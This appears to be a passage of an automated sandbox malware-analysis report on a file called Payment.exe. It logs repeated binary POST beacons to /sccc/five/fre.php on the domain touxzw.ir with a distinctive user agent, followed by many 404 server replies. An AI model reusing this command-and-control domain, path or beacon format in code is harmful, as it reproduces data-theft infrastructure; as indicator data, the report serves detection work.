Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_008822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_008822EE

Source: global traffic

DNS traffic detected: DNS query: touxzw.ir

Source: unknown

HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MtEPqZ1%2BG%2BzGYYkxdyVqLIefDdE56RFCKUvhm68mwXqcG%2BhToWWS4gmNVNr5KBtOjWrBX3CSLlfYE5BhkRhWRuS3CmMEi2AZytq4YNSkEOzxngzzHRf0kIZI00g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bae7c288272c2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6nUjIOkYS8eccF7Sa6lFGgSEI6%2FKRyHmHKPymTDa4jT3xbQbVA4yT9Sym5lB3uB7DzwV5SlgS7K2%2FIxRh%2FDfD3YKTJhNlfGboG%2B%2FbdSTsdpmGIdfu3uPztlQieg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bae8d5da243e8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1698&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtcTR9jhaN3Vc40ZOrwH%2BNtZVhl9Jfy1ahLuylZ3eGbYkdS2Chxj03gf%2FzAh72twT%2BHyo%2BY%2BAzLDl42x%2FciX1qLDp3qHw9R%2BknMrfxBlZ6Q5nZqQ%2BQZu%2BxfWna4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bae995eb54357-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ooS7M6p3hFovmhe3j4vtwpcB0Z6qdS3KZw9OudztqDIsLuMKQ2S3kTvFOHw%2FYPN3eTjKlOsvX%2BczeL1up%2FGkdevABbkFCkmbxby4MUuCOCfP32ZJX9jF87jTRo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baecabf768c54-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2286&min_rtt=2286&rtt_var=1143&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uWFhaE3whz641PbAwea1oeP%2FawC2cszFaVNg%2Fol0qMePdm9h41xMs0xVTj6jkkG517g8%2Bc5PDXF9gN3rRE140fUZA71tMRI%2FS7pDvFKy1hew22itM5G63muKK38%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baefadba141fe-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1917&rtt_var=958&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0qiQZaPuGrFNy0Rq8NLirLHUMBtLk4c8win3EE1lOVFdGuEaWHrrWKwTM0I6r%2BswqqSoQZDicYpmqlb%2FudGuEOmB9RH9fJHL93nM%2FRYPw68fARE%2FKIgdjcoLqCU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baf13391a43d5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TaIoEu90mJIngsLChlXdeXqdtZKYGU9ZcfouoSc95k%2Bcy%2FC7o1517Gy%2BhY6zGUyl67GWh%2FlcLgA0LWFhPNrMS0H7eAfJzYo7wcv10zB1fSSUwb%2FJBO9e95QEXvw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baf1f587d1821-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hxnlou21wpYhw7he1yYk0MyJh2Hn52lmT0cuCDuHv%2FeiRJ1D%2BHgOlTGuNIW%2BvUR5uqYOitpVYG4s2RPHXiL5ccHSy0SB0X5BHlEC2Uq7wy7fZL7Ok2GaZ15qCzs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baf2bab8343b5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uw%2FDMMmNnFJ%2FS79TZFmO7KHQ%2BRWMFCz8OM5abAdq9kd4AviIgIq6Ea5FTNtmn0mQYO8ZdwcM8peFuIubVviC5R33a3RNzZJ5JW5oYO5Uno2095lIMNbvtbh5bBw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baf37c85419bf-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1967&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kn%2BRKnqsDkO%2Fe9pDaZDmRmY55R5GICDNO6Ng92JV%2Fsimgm2r7%2BELfrCBPFmdPjfv5rWrfuXLQbuHFE4AXzPJDiAw8q3Z9ypWHHi0W4dwtsqK3cIOlLaubLuIdSE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baf43de727c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1956&rtt_var=978&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lW6erRAwxZGNF0K7mnf%2Brgo5GHxeii9Ze5x7bZKQo94ZWE5%2FfN9fO9%2F0cP8uhHR%2B4C3wQpOwOi24f9OVFG%2BOhzFF1AaMuQNW7XTXxvbhG2QPqkkW3hZvjdERHWM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baf5cfd9442b1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:41:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b2qmS8%2FSUrlCsrp2PI4NO8vi361xBAsGAb6O8HifFFWpDGmv6k1vR7iCPGsB69rqlMmNBiS3zd4pEq1x0IYdl1eP3NnnGiqf79eotV2A09Hcq1kvDWSio6Yp5SU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baf750d0f41d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VM%2FZD%2BOhAF0upqJja%2Fw6Bsh4lfixzYM4ev3TSzwq9LQ5RW8nHI2oaiDnZfPaYjokxgXneRYckVaH4XMjdCdWU2se4V127x3FX%2Fa7DrbVqJI3%2By%2FV3UoAojo8JSc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baf8d8a985e61-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2252&min_rtt=2252&rtt_var=1126&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AzzZqHsfbFecRHRHL1xKpV%2FkdOIH3rJqTc7XaOQHffo1GjdSc0njHL945e6OTwMQtig81O1d1XLwe4Xme7rrcyNR7Xr8KThlSZ9MXFTbrf8oJFQHlQvWoS1eAng%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bafa5ca780f53-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1665&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NibJjZyePLoNYyQVw0xYUe5EPh2Xbx4l%2B1lV2bjJa8pPsE%2BAsV3fwJNcn%2FkQgB7sQsteKEoifBazv%2FHfqvZRqIJgaMGgXl8DR2dP0ME9IC%2FpZGjUfVtN5AzmSNU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bafbd9c3d8ca8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1979&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gEm918E48ihdp69tLYmBDVrmHLoQr4%2FY7LNaFrQIdxAcFKwD5HWujMsQa1ktzVcHU20BSp9STDDfQNc8Mmo8b%2BWXjvX16xaLS6w58dFwLN9nyoAZcMAr%2B%2B3o%2F0k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bafe2ff0e7c99-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2045&rtt_var=1022&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SO%2BdkrZb1qLOpmPVWF3uaPhGXhMdHBB4iGTt8Axf1ZTp5%2Ftl3mI62YburOneO9rTa2ihm1%2F5b6RLwQVGwO32lPrQAc0azt3Mj03t7WQEPsvvq4fpJoCd6CGw03Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918baffafce543e7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1674&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pcNQunlHIkmxDh6ocUw9fnccAlDoiz5ECRKYDznyFSfhU2zoT4LX8jDEMm%2FBcH2i0d0fnOKu0qZcNbEC0WKa0xE7bX9gPR2RnY%2BJhC8bTS6yer4EpWpnAURDdzY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb0067a854210-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1697&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjAl2Qw%2F%2FRAEkUmZPbfUVMOEj4FvgQ51MkhO1Np8u%2BF8GeySGTjLTAJUcAB1sQ7W%2BKSZ0M2upNOVYOHJfB%2BM8HSAoEozgeRL%2BwrRb6hO8S30DHIO7m6wJ4k04Ms%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb011b8cf42e3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2522&min_rtt=2522&rtt_var=1261&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Feb 2025 22:42:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqUD2ZmTjMSpD%2BZNvRTXGzrfadaKDYrsAdqSlLfc3P7EJ4mmtdRBMRR4yCKV8F8Bu%2FiFDlSOl5TdCGjiI3C88ypbIrC3V8sD%2FxrykvIzQa0oHwC4LA4CejT1XkM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 918bb029fffd1885-EWRalt-svc: h3=":443"; ma=86400server-timing: 